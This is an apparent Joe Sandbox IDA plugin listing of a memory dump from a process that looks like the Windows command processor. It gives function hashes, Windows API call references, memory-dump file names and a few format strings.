                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: iswdigit
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: GeToken: (%x) '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3849470556-1994581435
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d1612e03fd0c16682ba2ca1a0f2759109ac8d81b439d0d846e1ebae818eb32b6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2514722A4864B85FB66AF16E44427DB6A0FB44B54FD18436DA5F432A1DFBCE890C370
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7D1539A10
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D1539994
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D153A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7D1539A82), ref: 00007FF7D153A77A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D153A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7D1539A82), ref: 00007FF7D153A839
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D153A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7D1539A82), ref: 00007FF7D153A850
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcsrchr.MSVCRT ref: 00007FF7D1539A62
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s=%s$.
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3242694432-4275322459
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8e45d200b54c4f622c27afed47b75a3f36adf12eaee8089f288f3be54d7564e5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9419F61A0964B85FF11BB5190502BDE2A0AF867A0FD44236DD5F077E5EFFCE4828360
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7D15354E6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7D153552E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D153758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7D1536999,?,?,?,?,?,00007FF7D1528C39), ref: 00007FF7D15375AE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D153758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7D1536999,?,?,?,?,?,00007FF7D1528C39), ref: 00007FF7D15375C6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 779401067-630742106
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f416a403220271bb9541fa4ca1aee5169419154f3707bffaa39f21993951511c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3951767262868B81FB51AB11E4017FEE361EF94784FD05033DA4F4BA65DEBCE5458720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CurrentDirectorytowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: :$:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 238703822-3780739392
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3d3567b6efcd5d8ba320e2947850ad0ede8341a64a56949b279e31717d43b0b2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B11225360864A81FB24AB61E80127DF6A0EF89799FC58133DE0E477B5EF7CD0418724
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3677997916-3870813718
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: b7a26f1bfd40825f8261a113f7500907015f6394d2db595a66b0ebac51271b2e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32113D76618A4A97E710AF10E44026EF760FB8A764FD04132DA8E02778DFBCC048CB10
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memsetwcsrchr$wcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 110935159-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: c69a388bc8b3a3ff16e2786c96b1100a2dbfc28b8c9e9179231870a23454a700
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f06c7a11d847e804fe1bf429bb5638754f5780586fe6ea91fd2b119fbd7b981c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c69a388bc8b3a3ff16e2786c96b1100a2dbfc28b8c9e9179231870a23454a700
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0151B422B0978B85FF21AB1194003FDE291AF48BA4FC94532CD5F4B7A5DF7CE5818220
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$CurrentDirectorytowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1403193329-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 803eba6ff31649e7235b39e315db9048ff9d9c1ecb4f78fabd3f92a2c075e05e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D51A327A0568A85FB24AF20D8406BEB6B0FF44758FC58177CE0F876A4EFBC95449720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00007FF7D151921C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7D15193AA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1518B20: wcsrchr.MSVCRT ref: 00007FF7D1518BAB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1518B20: _wcsicmp.MSVCRT ref: 00007FF7D1518BD4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1518B20: _wcsicmp.MSVCRT ref: 00007FF7D1518BF2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1518B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1518C16
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1518B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7D1518C2F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1518B20: wcschr.MSVCRT ref: 00007FF7D1518CB3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D152417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7D15241AD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7D15192AC), ref: 00007FF7D15230CA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523060: SetErrorMode.KERNELBASE ref: 00007FF7D15230DD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D15230F6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523060: SetErrorMode.KERNELBASE ref: 00007FF7D1523106
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcsrchr.MSVCRT ref: 00007FF7D15192D8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1519362
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7D1519373
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3966000956-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5708ded549f549a136fb02a5be9eff6c413d59be5cd05def112f5a69c71b855a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2751A322A0968B85FB62AF11D8502BDB3A0FB49B44FC55036DA0F47BA4DF7CE591C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$_setjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3883041866-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2124138010038f54997149509e1e503f99574355f749c6d48a30454d44694652
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC51413260878A8AFB619F21D8503EDB7A4FB45748FD04136E64E87A68DFBCD644C710
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D151B4BD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206F0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D152074D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D1520762
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D151B518
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D151B58B
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: ELSE$IF/?
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3223794493-1134991328
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: cc8a4a6b2d6907aa8cff5e1f0c718eb4bbe54af75f128201aeb076963007bb56
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63414822A0D64B81FF56BB64E4112BDB2A1AF55740FD64437D50F472B6EEBCE4808370
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1532185241-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2b400c0670d811b645aa9162efda08d288951c5fee55cb151bdfd21ee0db1c67
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8741D232A0475B87F754AB21E4455BDBAA1FB88B40FD54536EA0B437A0CFBCE851C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
